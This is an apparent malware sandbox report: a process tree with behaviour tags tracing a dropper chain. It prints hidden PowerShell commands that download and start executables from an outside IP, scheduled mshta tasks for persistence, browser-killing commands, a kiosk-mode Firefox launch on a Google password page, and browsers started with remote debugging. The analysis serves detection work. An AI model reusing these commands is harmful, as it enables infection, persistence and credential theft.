102 PID 4520 wrote to memory of 2204 4520 cmd.exe 102 PID 4520 wrote to memory of 4476 4520 cmd.exe 104 PID 4520 wrote to memory of 4476 4520 cmd.exe 104 PID 4520 wrote to memory of 4476 4520 cmd.exe 104 PID 4476 wrote to memory of 2040 4476 cmd.exe 105 PID 4476 wrote to memory of 2040 4476 cmd.exe 105 PID 4476 wrote to memory of 2040 4476 cmd.exe 105 PID 2352 wrote to memory of 2132 2352 powershell.exe 106 PID 2352 wrote to memory of 2132 2352 powershell.exe 106 PID 2352 wrote to memory of 2132 2352 powershell.exe 106 PID 2032 wrote to memory of 1452 2032 skotes.exe 107 PID 2032 wrote to memory of 1452 2032 skotes.exe 107 PID 2032 wrote to memory of 1452 2032 skotes.exe 107 PID 1452 wrote to memory of 920 1452 amnew.exe 108 PID 1452 wrote to memory of 920 1452 amnew.exe 108 PID 1452 wrote to memory of 920 1452 amnew.exe 108 PID 4520 wrote to memory of 3900 4520 cmd.exe 109 PID 4520 wrote to memory of 3900 4520 cmd.exe 109 PID 4520 wrote to memory of 3900 4520 cmd.exe 109 PID 3900 wrote to memory of 1824 3900 cmd.exe 110 PID 3900 wrote to memory of 1824 3900 cmd.exe 110 PID 3900 wrote to memory of 1824 3900 cmd.exe 110 PID 4520 wrote to memory of 4056 4520 cmd.exe 111 PID 4520 wrote to memory of 4056 4520 cmd.exe 111 PID 4520 wrote to memory of 4056 4520 cmd.exe 111 PID 4056 wrote to memory of 3088 4056 cmd.exe 112 PID 4056 wrote to memory of 3088 4056 cmd.exe 112 PID 4056 wrote to memory of 3088 4056 cmd.exe 112 PID 4520 wrote to memory of 1752 4520 cmd.exe 113 PID 4520 wrote to memory of 1752 4520 cmd.exe 113 PID 4520 wrote to memory of 1752 4520 cmd.exe 113 PID 4520 wrote to memory of 760 4520 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\1086705101\d67718582a.exe"C:\Users\Admin\AppData\Local\Temp\1086705101\d67718582a.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Z8UgTmauSLw /tr "mshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Z8UgTmauSLw /tr "mshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4780
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE"C:\Users\Admin\AppData\Local\Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "8cxKPmaAy8u" /tr "mshta \"C:\Temp\koWg8wZ64.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1752
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\koWg8wZ64.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4336
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:920 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:464
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 8286⤵
- Program crash
PID:3588
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:544
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 9726⤵
- Program crash
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1480 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 9646⤵
- Program crash
PID:4412
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008060101\eb522d694c.exe"C:\Users\Admin\AppData\Local\Temp\10008060101\eb522d694c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2040 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:4412
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4080 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {19f1456a-c973-4655-bc78-a3530e3d736b} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" gpu8⤵PID:2652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f4433fc-46cb-4b28-a904-5299e748482b} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" socket8⤵PID:2676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3120 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1c517b-d109-45bd-9223-d3f97828553e} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab8⤵PID:3220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3972 -childID 2 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e805e1b5-f73b-4f70-a90d-e0669db75580} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab8⤵PID:4904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4736 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8793857-5108-42c8-b9e2-93f3f0681fc8} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" utility8⤵
- Checks processor information in registry
PID:3484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5276 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8391e446-b118-4365-97de-86de5b8b97ae} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab8⤵PID:5340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {958faacf-1eeb-49d5-9de5-aaf41503ece9} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab8⤵PID:5352
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5756 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5768 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44be0b17-f4ed-42ae-afeb-15ef7a8a59dd} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab8⤵PID:5368
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008070101\c7ef445ed3.exe"C:\Users\Admin\AppData\Local\Temp\10008070101\c7ef445ed3.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:4748 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:6276
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086776001\6d5890a57c.exe"C:\Users\Admin\AppData\Local\Temp\1086776001\6d5890a57c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\1086777001\1da84c3340.exe"C:\Users\Admin\AppData\Local\Temp\1086777001\1da84c3340.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\1086778001\c5859bfd97.exe"C:\Users\Admin\AppData\Local\Temp\1086778001\c5859bfd97.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\1086779001\88e0f792cc.exe"C:\Users\Admin\AppData\Local\Temp\1086779001\88e0f792cc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 9644⤵
- Program crash
PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4084
-
-
C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2952 -
C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
PID:3088 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5600 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff87d61cc40,0x7ff87d61cc4c,0x7ff87d61cc586⤵PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1812 /prefetch:26⤵PID:1636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2004,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1880 /prefetch:36⤵PID:3324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2468 /prefetch:86⤵PID:5780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:16⤵
- Uses browser remote debugging
PID:620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3380,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3392 /prefetch:16⤵
- Uses browser remote debugging
PID:2008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:16⤵
- Uses browser remote debugging
PID:5216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:86⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:86⤵PID:5376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:86⤵PID:6824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4928,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:86⤵PID:6948
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6352 -
